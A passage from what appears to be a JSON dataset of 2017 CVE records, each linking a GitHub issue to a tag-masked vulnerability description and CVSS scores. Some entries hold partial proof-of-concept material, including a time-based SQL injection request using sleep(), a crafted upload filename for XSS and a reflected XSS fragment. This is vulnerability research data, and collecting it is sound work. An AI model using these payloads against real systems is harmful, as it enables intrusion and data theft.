  12410. "description": "SQL Injection in APITAG . FILETAG ERRORTAG options SET value APITAG name CODETAG options SET value APITAG name APITAG POC: first, access FILETAG to get a token: APITAG then access follow: CODETAG We'll find that the page is sleep NUMBERTAG seconds, which proved the vulnerability exist.",
  12411. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12412. "severity": "CRITICAL",
  12413. "baseScore": 9.8,
  12414. "impactScore": 5.9,
  12415. "exploitabilityScore": 3.9
  12416. },
  12417. {
  12418. "CVE_ID": "CVE-2017-5608",
  12419. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/600",
  12420. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/600",
  12421. "Repo_new": "piwigo/piwigo",
  12422. "Issue_Created_At": "2017-01-04T05:26:39Z",
  12423. "description": "Cross Site Scripting in image upload.. Latest Version of piwigo is vulnerable to cross site scripting vulnerability in the image upload function, The filename of image can be crafted with malicious payload,which in turn executes while viewing the image. HTTP REQUEST: POST PATHTAG HTTP NUMBERTAG Host: x.x.x.x:xxxx User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Length NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Cookie: APITAG APITAG cid NUMBERTAG APITAG Connection: close NUMBERTAG Content Disposition: form data; name=\"name\" test NUMBERTAG Content Disposition: form data; name=\"chunk NUMBERTAG Content Disposition: form data; name=\"chunks NUMBERTAG Content Disposition: form data; name=\"category NUMBERTAG Content Disposition: form data; name=\"level NUMBERTAG Content Disposition: form data; name=\"pwg_token\" APITAG NUMBERTAG Content Disposition: form data; name=\"file\"; filename=\" payloadhere .png\" Content Type: image/png Malicious script can be passed in the payloadhere section",
  12424. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12425. "severity": "MEDIUM",
  12426. "baseScore": 6.1,
  12427. "impactScore": 2.7,
  12428. "exploitabilityScore": 2.8
  12429. },
  12430. {
  12431. "CVE_ID": "CVE-2017-5617",
  12432. "Issue_Url_old": "https://github.com/blackears/svgSalamander/issues/11",
  12433. "Issue_Url_new": "https://github.com/blackears/svgsalamander/issues/11",
  12434. "Repo_new": "blackears/svgsalamander",
  12435. "Issue_Created_At": "2017-01-27T07:34:16Z",
  12436. "description": "SSRF APITAG Side Request Forgery) is possible. If the library is being used in a web application for processing user supplied SVG files then the app is vulnerable to SSRF. The attacker can send a specially crafted svg file, for example %% APITAG APITAG APITAG %% and the lib will send the request inside the trusted network to the APITAG (bypassing the firewall). In general, the attacker can use any scheme supported by default (such as APITAG , APITAG etc) or use application specific scheme. How to fix any schemes apart from data in the APITAG attribute should be disallowed by default at URLTAG Additional information: CVETAG URLTAG",
  12437. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  12438. "severity": "HIGH",
  12439. "baseScore": 7.4,
  12440. "impactScore": 4.0,
  12441. "exploitabilityScore": 2.8
  12442. },
  12443. {
  12444. "CVE_ID": "CVE-2017-5638",
  12445. "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/8064",
  12446. "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/8064",
  12447. "Repo_new": "rapid7/metasploit-framework",
  12448. "Issue_Created_At": "2017-03-07T06:21:03Z",
  12449. "description": "CVETAG Apache Struts2 S NUMBERTAG Possible Remote Code Execution when performing file upload based on Jakarta Multipart parser. ... > It is possible to perform a RCE attack with a malicious Content Type value. If the Content Type value isn't valid an exception is thrown which is then used to display an error message to a user. ERRORTAG References URLTAG URLTAG",
  12450. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  12451. "severity": "CRITICAL",
  12452. "baseScore": 10.0,
  12453. "impactScore": 6.0,
  12454. "exploitabilityScore": 3.9
  12455. },
  12456. {
  12457. "CVE_ID": "CVE-2017-5834",
  12458. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/89",
  12459. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/89",
  12460. "Repo_new": "libimobiledevice/libplist",
  12461. "Issue_Created_At": "2017-01-18T02:20:02Z",
  12462. "description": "heap buffer overflow in parse_dict_node NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG c1a at pc NUMBERTAG a0 bp NUMBERTAG bffd NUMBERTAG sp NUMBERTAG bffd NUMBERTAG c READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG c1a thread T NUMBERTAG f in parse_array_node PATHTAG NUMBERTAG f in parse_bin_node PATHTAG NUMBERTAG a0f3 in parse_bin_node_at_index PATHTAG NUMBERTAG b NUMBERTAG e in plist_from_bin PATHTAG NUMBERTAG a1c4 in main PATHTAG NUMBERTAG b NUMBERTAG ba NUMBERTAG PATHTAG NUMBERTAG ad NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG c1a is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  12463. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12464. "severity": "MEDIUM",
  12465. "baseScore": 5.5,
  12466. "impactScore": 3.6,
  12467. "exploitabilityScore": 1.8
  12468. },
  12469. {
  12470. "CVE_ID": "CVE-2017-5836",
  12471. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/86",
  12472. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/86",
  12473. "Repo_new": "libimobiledevice/libplist",
  12474. "Issue_Created_At": "2017-01-15T15:44:18Z",
  12475. "description": "Issue in plist_free_data APITAG ERRORTAG Sample base NUMBERTAG APITAG",
  12476. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12477. "severity": "HIGH",
  12478. "baseScore": 7.5,
  12479. "impactScore": 3.6,
  12480. "exploitabilityScore": 3.9
  12481. },
  12482. {
  12483. "CVE_ID": "CVE-2017-5875",
  12484. "Issue_Url_old": "https://github.com/dotCMS/core/issues/10643",
  12485. "Issue_Url_new": "https://github.com/dotcms/core/issues/10643",
  12486. "Repo_new": "dotcms/core",
  12487. "Issue_Created_At": "2017-02-06T09:17:56Z",
  12488. "description": "Multiple XSS in APITAG NUMBERTAG Expected Behavior Current Behavior Possible Solution Known Workarounds Steps to Reproduce (for bugs NUMBERTAG Context Your Environment APITAG version used: Browser Name and version: Operating System and version: Application Server and version: Java Brand and version: Database and version: Application module (if apply): The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser. XSS CVETAG APITAG Necessary): POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: es ES,es; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG opvc NUMBERTAG b4f NUMBERTAG adbd NUMBERTAG d6 a NUMBERTAG b d NUMBERTAG a NUMBERTAG fa; sitevisitscookie NUMBERTAG dmid NUMBERTAG f NUMBERTAG d1c NUMBERTAG c NUMBERTAG a NUMBERTAG bb NUMBERTAG APITAG APITAG APITAG APITAG Dl; _gat NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG APITAG APITAG FILETAG XSS CVETAG : GET PATHTAG APITAG f6ba NUMBERTAG b NUMBERTAG adef NUMBERTAG b7ed NUMBERTAG a NUMBERTAG HTTP NUMBERTAG FILETAG XSS CVETAG : GET PATHTAG APITAG FILETAG How to fix: URLTAG",
  12489. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12490. "severity": "MEDIUM",
  12491. "baseScore": 5.4,
  12492. "impactScore": 2.7,
  12493. "exploitabilityScore": 2.3
  12494. },
  12495. {
  12496. "CVE_ID": "CVE-2017-5879",
  12497. "Issue_Url_old": "https://github.com/exponentcms/exponent-cms/issues/73",
  12498. "Issue_Url_new": "https://github.com/exponentcms/exponent-cms/issues/73",
  12499. "Repo_new": "exponentcms/exponent-cms",
  12500. "Issue_Created_At": "2017-02-06T09:00:59Z",
  12501. "description": "Time Based SQL Injection Exponent CMS NUMBERTAG and others versions. This is a blind SQL injection that can be exploited by un authenticated users via an HTTP GET request and which can be used to dump database data out to a malicious server, using an out of band technique, such as APITAG The vulnerability affects FILETAG andthe following parameter: src. APITAG example: GET APITAG NUMBERTAG b(select from(select(sleep NUMBERTAG a NUMBERTAG b\\ HTTP NUMBERTAG Host: localhost Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close FILETAG How to fix: URLTAG",
  12502. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12503. "severity": "CRITICAL",
  12504. "baseScore": 9.8,
  12505. "impactScore": 5.9,
  12506. "exploitabilityScore": 3.9
  12507. },
  12508. {
  12509. "CVE_ID": "CVE-2017-5923",
  12510. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/597",
  12511. "Issue_Url_new": "https://github.com/virustotal/yara/issues/597",
  12512. "Repo_new": "virustotal/yara",
  12513. "Issue_Created_At": "2017-01-23T11:29:59Z",
  12514. "description": "Heap out of bounds read in APITAG Heap out of bounds read in APITAG Git HEAD: APITAG To reproduce: APITAG FILETAG ASAN: ERRORTAG",
  12515. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12516. "severity": "HIGH",
  12517. "baseScore": 7.5,
  12518. "impactScore": 3.6,
  12519. "exploitabilityScore": 3.9
  12520. },
  12521. {
  12522. "CVE_ID": "CVE-2017-5924",
  12523. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/593",
  12524. "Issue_Url_new": "https://github.com/virustotal/yara/issues/593",
  12525. "Repo_new": "virustotal/yara",
  12526. "Issue_Created_At": "2017-01-08T11:32:08Z",
  12527. "description": "Use after free in APITAG Use after free in APITAG Tested on latest Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  12528. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12529. "severity": "HIGH",
  12530. "baseScore": 7.5,
  12531. "impactScore": 3.6,
  12532. "exploitabilityScore": 3.9
  12533. },
  12534. {
  12535. "CVE_ID": "CVE-2017-5938",
  12536. "Issue_Url_old": "https://github.com/viewvc/viewvc/issues/137",
  12537. "Issue_Url_new": "https://github.com/viewvc/viewvc/issues/137",
  12538. "Repo_new": "viewvc/viewvc",
  12539. "Issue_Created_At": "2017-01-24T23:46:38Z",
  12540. "description": "XSS vulnerability in nav_path template data. APITAG does not properly escape the names of versioned directories and files before making them available for use via its APITAG HTML template variables. These variables are used in APITAG default templates, and would likely be used in folks' customized templates, too. A user with commit privileges to the repository could introduce a versioned directory or file with a name that contains an executable script (e.g., ERRORTAG ), and the script would be evaluated upon a user's navigation (via web browser) to APITAG view of that directory or file.",
  12541. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12542. "severity": "MEDIUM",
  12543. "baseScore": 6.1,
  12544. "impactScore": 2.7,
  12545. "exploitabilityScore": 2.8
  12546. },
  12547. {
  12548. "CVE_ID": "CVE-2017-5945",
  12549. "Issue_Url_old": "https://github.com/justinhunt/moodle-filter_poodll/issues/23",
  12550. "Issue_Url_new": "https://github.com/justinhunt/moodle-filter_poodll/issues/23",
  12551. "Repo_new": "justinhunt/moodle-filter_poodll",
  12552. "Issue_Created_At": "2017-01-09T09:59:55Z",
  12553. "description": "Moodle NUMBERTAG Plugin APITAG Filter\u201d \u2013 Cross Site Scripting(XSS). Hello: Moodle NUMBERTAG Plugin APITAG Filter\u201d \u2013 Cross Site Scripting(XSS) Procuct: Moodle plugin APITAG Filter\u201d Download url: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in Moodle plugin APITAG Filter\u201d, which can be exploited to add,modify or delete information in application`s database and gain complete control over the application. The vulnerability exists due to insufficientfiltration of user supplied data in \u201cpoodll_audio_url\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebox: POC: URLTAG APITAG NUMBERTAG Could you please help me assign a CVE for this issue?",
  12554. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12555. "severity": "MEDIUM",
  12556. "baseScore": 6.1,
  12557. "impactScore": 2.7,
  12558. "exploitabilityScore": 2.8
  12559. },
  12560. {
  12561. "CVE_ID": "CVE-2017-5946",
  12562. "Issue_Url_old": "https://github.com/rubyzip/rubyzip/issues/315",
  12563. "Issue_Url_new": "https://github.com/rubyzip/rubyzip/issues/315",
  12564. "Repo_new": "rubyzip/rubyzip",
  12565. "Issue_Created_At": "2017-02-04T13:14:48Z",
  12566. "description": "Directory traversal vulnerability. Overview Rubyzip module allows to overwrite or create arbitrary files via relative filenames and thus executing malicious code, e.g. by writing to APITAG ~/.bashrc etc. Proof of concept: ERRORTAG rubyzip_test_traversal.rb : CODETAG Vulnerable version and test environment ERRORTAG Analogous vulnerability in minitar gem: URLTAG",
  12567. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12568. "severity": "CRITICAL",
  12569. "baseScore": 9.8,
  12570. "impactScore": 5.9,
  12571. "exploitabilityScore": 3.9
  12572. },
  12573. {
  12574. "CVE_ID": "CVE-2017-5950",
  12575. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/459",
  12576. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/459",
  12577. "Repo_new": "jbeder/yaml-cpp",
  12578. "Issue_Created_At": "2017-01-17T14:35:37Z",
  12579. "description": "Stack Overflow in APITAG Stack Overflow in APITAG Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  12580. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12581. "severity": "MEDIUM",
  12582. "baseScore": 5.5,
  12583. "impactScore": 3.6,
  12584. "exploitabilityScore": 1.8
  12585. },
  12586. {
  12587. "CVE_ID": "CVE-2017-5954",
  12588. "Issue_Url_old": "https://github.com/commenthol/serialize-to-js/issues/1",
  12589. "Issue_Url_new": "https://github.com/commenthol/serialize-to-js/issues/1",
  12590. "Repo_new": "commenthol/serialize-to-js",
  12591. "Issue_Created_At": "2017-02-09T08:11:43Z",
  12592. "description": "APITAG can be abused to achieve arbitrary code injection with an IIFE. ERRORTAG I don't know if this is a functionality as you are using APITAG internally, but the module should not execute code on deserialization.",
  12593. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12594. "severity": "CRITICAL",
  12595. "baseScore": 9.8,
  12596. "impactScore": 5.9,
  12597. "exploitabilityScore": 3.9
  12598. },
  12599. {
  12600. "CVE_ID": "CVE-2017-5959",
  12601. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/70",
  12602. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/70",
  12603. "Repo_new": "semplon/genixcms",
  12604. "Issue_Created_At": "2017-02-09T13:23:36Z",
  12605. "description": "CSRF in background management of NUMBERTAG latest version). APITAG implement token to defend CSRF in background management webpage. An attacker is able to bypass the defense as follows: First, visit the FILETAG page and grab a token, which can be used to launch a CSRF attack: APITAG Then, use the following APITAG token used following is in another test.): CODETAG Finally, the response demonstrated that the token is valid: APITAG Thus, we bypass the defense against CSRF, and is able to add an admin account of APITAG",
  12606. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12607. "severity": "CRITICAL",
  12608. "baseScore": 9.8,
  12609. "impactScore": 5.9,
  12610. "exploitabilityScore": 3.9
  12611. },
  12612. {
  12613. "CVE_ID": "CVE-2017-5960",
  12614. "Issue_Url_old": "https://github.com/PhalconEye/phalconeye/issues/133",
  12615. "Issue_Url_new": "https://github.com/phalconeye/phalconeye/issues/133",
  12616. "Repo_new": "phalconeye/phalconeye",
  12617. "Issue_Created_At": "2017-02-10T04:55:21Z",
  12618. "description": "Phalcon Eye Multiple Cross Site Scripting (XSS). Procuct: Phalcon Eye Vendor: Phalcon ( URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered Multiple Cross Site Scripting (XSS) in Phalcon Eye, which can be exploited to add,modify or delete information in application`s database and gain complete control over the application. The vulnerability exists due to insufficientfiltration of user supplied data in multiple HTTP GET parameters passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebo NUMBERTAG URLTAG APITAG NUMBERTAG URLTAG APITAG Could you please help me assign a CVE for this issue?",
  12619. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12620. "severity": "MEDIUM",
  12621. "baseScore": 6.1,
  12622. "impactScore": 2.7,
  12623. "exploitabilityScore": 2.8
  12624. },
  12625. {
  12626. "CVE_ID": "CVE-2017-5961",
  12627. "Issue_Url_old": "https://github.com/ionize/ionize/issues/393",
  12628. "Issue_Url_new": "https://github.com/ionize/ionize/issues/393",
  12629. "Repo_new": "ionize/ionize",
  12630. "Issue_Created_At": "2017-02-10T04:42:51Z",
  12631. "description": "ionize NUMBERTAG Cross Site Scripting (XSS). Procuct: ionize Vendor: ionize ( FILETAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in ionize, which can be exploited to add,modify or delete information in application`s database and gain complete control over the application. The vulnerability exists due to insufficientfiltration of user supplied data in \u201cpath\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: URLTAG Could you please help me assign a CVE for this issue?",
  12632. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12633. "severity": "MEDIUM",
  12634. "baseScore": 6.1,
  12635. "impactScore": 2.7,
  12636. "exploitabilityScore": 2.8
  12637. },
  12638. {
  12639. "CVE_ID": "CVE-2017-5964",
  12640. "Issue_Url_old": "https://github.com/emoncms/emoncms/issues/636",
  12641. "Issue_Url_new": "https://github.com/emoncms/emoncms/issues/636",
  12642. "Repo_new": "emoncms/emoncms",
  12643. "Issue_Created_At": "2017-02-11T17:17:31Z",
  12644. "description": "Emoncms NUMBERTAG lastest version) Multiple Cross Site Scripting (XSS). Procuct: Emoncms NUMBERTAG unlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered multiple Cross Site Scripting (XSS) in Emoncms NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficientfiltration of user supplied data in multiple HTTP GET parameters passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebo NUMBERTAG URLTAG NUMBERTAG URLTAG Could you please help me assign a CVE for this issue?",
  12645. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12646. "severity": "MEDIUM",
  12647. "baseScore": 6.1,
  12648. "impactScore": 2.7,
  12649. "exploitabilityScore": 2.8
  12650. },
  12651. {
  12652. "CVE_ID": "CVE-2017-5990",
  12653. "Issue_Url_old": "https://github.com/phreebooks/PhreeBooksERP/issues/230",
  12654. "Issue_Url_new": "https://github.com/phreebooks/phreebookserp/issues/230",
  12655. "Repo_new": "phreebooks/PhreeBooksERP",
  12656. "Issue_Created_At": "2017-02-11T17:38:17Z",
  12657. "description": "APITAG NUMBERTAG lastest version) Multiple Cross Site Scripting (XSS). Procuct: APITAG Vunlerable Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered multiple Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficientfiltration of user supplied data in \"form\" HTTP GET parameter passed to PATHTAG and PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the APITAG APITAG function to see a pop up messagebo NUMBERTAG URLTAG NUMBERTAG URLTAG Could you please help me assign a CVE for this issue?",
  12658. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12659. "severity": "MEDIUM",
  12660. "baseScore": 6.1,
  12661. "impactScore": 2.7,
  12662. "exploitabilityScore": 2.8
  12663. },
  12664. {
  12665. "CVE_ID": "CVE-2017-6059",
  12666. "Issue_Url_old": "https://github.com/pingidentity/mod_auth_openidc/issues/212",
  12667. "Issue_Url_new": "https://github.com/openidc/mod_auth_openidc/issues/212",
  12668. "Repo_new": "openidc/mod_auth_openidc",
  12669. "Issue_Created_At": "2017-01-18T15:44:38Z",
  12670. "description": "Don't show user supplied content in error pages. First: Thanks for this awesome Apache module! :) \ud83d\ude80 Via our Bug Bounty program URLTAG we got some reports of Text Injections in the error pages such as APITAG which would render as: ERRORTAG While I don't really see this as security relevant issue since spaces etc. are properly converted it would be awesome if the error messages would not show the user supplied content as I'm sure I'll have otherwise to cope with some more of these reports :)",
  12671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  12672. "severity": "HIGH",
  12673. "baseScore": 7.5,
  12674. "impactScore": 3.6,
  12675. "exploitabilityScore": 3.9
  12676. },
  12677. {
  12678. "CVE_ID": "CVE-2017-6062",
  12679. "Issue_Url_old": "https://github.com/pingidentity/mod_auth_openidc/issues/222",
  12680. "Issue_Url_new": "https://github.com/openidc/mod_auth_openidc/issues/222",
  12681. "Repo_new": "openidc/mod_auth_openidc",
  12682. "Issue_Created_At": "2017-01-30T18:06:27Z",
  12683. "description": "Security issue: APITAG pass does not scrub request headers. It seems that when ERRORTAG is set to pass the APITAG headers are not being scrubbed. I am using a configuration as follows: ERRORTAG And as expected I can make unauthenticated requests to APITAG . However if I set my browser to send the APITAG header then this gets passed through to the application, letting me spoof any username. Unless I'm missing something this seems like a rather serious security issue.",
  12684. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
  12685. "severity": "HIGH",
  12686. "baseScore": 8.6,
  12687. "impactScore": 4.0,
  12688. "exploitabilityScore": 3.9
  12689. },
  12690. {
  12691. "CVE_ID": "CVE-2017-6065",
  12692. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/71",
  12693. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/71",
  12694. "Repo_new": "semplon/genixcms",
  12695. "Issue_Created_At": "2017-02-13T10:16:39Z",
  12696. "description": "SQL injection vulnerability in PATHTAG in APITAG NUMBERTAG latest) discovered by APITAG of Venustech\". PATHTAG (line NUMBERTAG CODETAG The APITAG function in PATHTAG (line NUMBERTAG ERRORTAG The update function in PATHTAG (line NUMBERTAG ERRORTAG We'll find that the \"$key\" in $set .= \" APITAG = '$val',\"; isn't be filtered, which leads to SQL injection. APITAG URLTAG POST parameters: CODETAG Don't forget to get a token first.",
  12697. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  12698. "severity": "HIGH",
  12699. "baseScore": 8.8,
  12700. "impactScore": 5.9,
  12701. "exploitabilityScore": 2.8
  12702. },
  12703. {
  12704. "CVE_ID": "CVE-2017-6099",
  12705. "Issue_Url_old": "https://github.com/paypal/merchant-sdk-php/issues/129",
  12706. "Issue_Url_new": "https://github.com/paypal/merchant-sdk-php/issues/129",
  12707. "Repo_new": "paypal/merchant-sdk-php",
  12708. "Issue_Created_At": "2017-02-10T16:54:23Z",
  12709. "description": "I have find a Reflected XSS vulnerability in this sdk. Hello: I have find a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in \u201ctoken\u201d HTTP GET parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on _GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG APITAG The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  12710. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12711. "severity": "MEDIUM",
  12712. "baseScore": 6.1,
  12713. "impactScore": 2.7,
  12714. "exploitabilityScore": 2.8
  12715. },
  12716. {
  12717. "CVE_ID": "CVE-2017-6188",
  12718. "Issue_Url_old": "https://github.com/munin-monitoring/munin/issues/721",
  12719. "Issue_Url_new": "https://github.com/munin-monitoring/munin/issues/721",
  12720. "Repo_new": "munin-monitoring/munin",
  12721. "Issue_Created_At": "2016-07-27T10:07:37Z",
  12722. "description": "munin cgi graph CGI::param security problem. Running munin NUMBERTAG on Gentoo. I observed this message in the logs PATHTAG NUMBERTAG PERL WARNING] CGI::param called in list context from PATHTAG line NUMBERTAG this can lead to vulnerabilities. See the warning in APITAG the value or values of a single named parameter\" at PATHTAG line ERRORTAG . This allows injecting options into munin cgi graph (similar to URLTAG ), by doing something like this: PATHTAG which wrote the graph to /tmp/test.txt",
  12723. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  12724. "severity": "MEDIUM",
  12725. "baseScore": 5.5,
  12726. "impactScore": 3.6,
  12727. "exploitabilityScore": 1.8
  12728. },
  12729. {
  12730. "CVE_ID": "CVE-2017-6194",
  12731. "Issue_Url_old": "https://github.com/radare/radare2/issues/6829",
  12732. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6829",
  12733. "Repo_new": "radareorg/radare2",
  12734. "Issue_Created_At": "2017-02-21T17:57:07Z",
  12735. "description": "Heap buffer overflow in APITAG Heap buffer overflow in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  12736. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12737. "severity": "HIGH",
  12738. "baseScore": 7.8,
  12739. "impactScore": 5.9,
  12740. "exploitabilityScore": 1.8
  12741. },
  12742. {
  12743. "CVE_ID": "CVE-2017-6197",
  12744. "Issue_Url_old": "https://github.com/radare/radare2/issues/6816",
  12745. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/6816",
  12746. "Repo_new": "radareorg/radare2",
  12747. "Issue_Created_At": "2017-02-19T19:33:03Z",
  12748. "description": "Null pointer dereference in APITAG Null pointer dereference in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  12749. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12750. "severity": "MEDIUM",
  12751. "baseScore": 5.5,
  12752. "impactScore": 3.6,
  12753. "exploitabilityScore": 1.8
  12754. },
  12755. {
  12756. "CVE_ID": "CVE-2017-6213",
  12757. "Issue_Url_old": "https://github.com/paypal/invoice-sdk-php/issues/13",
  12758. "Issue_Url_new": "https://github.com/paypal/invoice-sdk-php/issues/13",
  12759. "Repo_new": "paypal/invoice-sdk-php",
  12760. "Issue_Created_At": "2017-02-21T10:11:31Z",
  12761. "description": "I have find a Reflected XSS vulnerability in this sdk. Hello: I have find a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user supplied data in \u201cverification_code\u201d HTTP GET parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_REQUEST FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech Email: EMAILTAG",
  12762. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12763. "severity": "MEDIUM",
  12764. "baseScore": 5.4,
  12765. "impactScore": 2.7,
  12766. "exploitabilityScore": 2.3
  12767. },
  12768. {
  12769. "CVE_ID": "CVE-2017-6215",
